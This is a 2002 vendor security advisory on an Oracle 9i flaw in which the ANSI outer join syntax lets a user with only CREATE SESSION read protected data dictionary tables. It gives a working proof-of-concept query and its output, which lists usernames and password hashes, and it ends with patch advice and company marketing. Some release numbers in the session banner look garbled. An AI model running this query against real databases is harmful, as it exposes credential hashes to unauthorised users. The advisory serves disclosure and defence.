Pentest Security Advisory : PTL-2002-02
Vulnerability with Oracle ANSI join syntax
Author: Pete Finnigan
Date: 2nd May 2002
This advisory describes an issue with the ANSI join syntax in Oracle 9i. Oracle still supports the old syntax but in the ANSI syntax there is a serious security issue that allows any user to view any data.
here is an example:
SQL*Plus: Release 126.96.36.199.1 - Production on Tue Apr 16 15:16:45 2 (c) Copyright 2001 Oracle Corporation. All rights reserved. Connected to: Oracle9i Enterprise Edition Release 188.8.131.52.1 - Production With the Partitioning option JServer Release 184.108.40.206.1 - Production SQL> connect / as sysdba Connected. SQL> CREATE USER us1 IDENTIFIED BY us11; User created. SQL> Grant Create Session to us1; Grant succeeded. SQL> connect us1/us11; Connected. SQL> select a.username, a.password 2 from sys.dba_users a left outer join sys.dba_users b on 3 b.username = a.username 4 ; USERNAME PASSWORD ------------------------------ ------------------------------ SYS D4C5016086B2DC6A SYSTEM D4DF7931AB130E37 ... ... RMAN E7B5D92911C831E1 QS_CB CF9CFACF5AE24964 QS_CS 91A00922D8C0F146 30 rows selected. SQL>
This shows that a user with the barest of privileges, i.e. CREATE SESSION can actually see data in the data dictionary that should not be seen. In this example we can select the list of usernames and their hashes.
These vulnerabilities have been tested on Oracle 9i version 9.0.1.x installed on Sun Solaris 2.8. All other platforms are vulnerable.
Apply vendor patches.
The vendor has issued a bulletin and made patches available on this
Pentest offers a thorough, yet adaptive range of security services to help customers address vulnerabilities in their network or applications. Services include: Secure Coding Workshops, SAST tools, Manual Penetration Testing and Security Audits.
Pentest offers a complete Database Security Assessment Service (DSAS) to businesses that rely on the security of the information held within their databases or have concerns relating to the security compliance of these systems.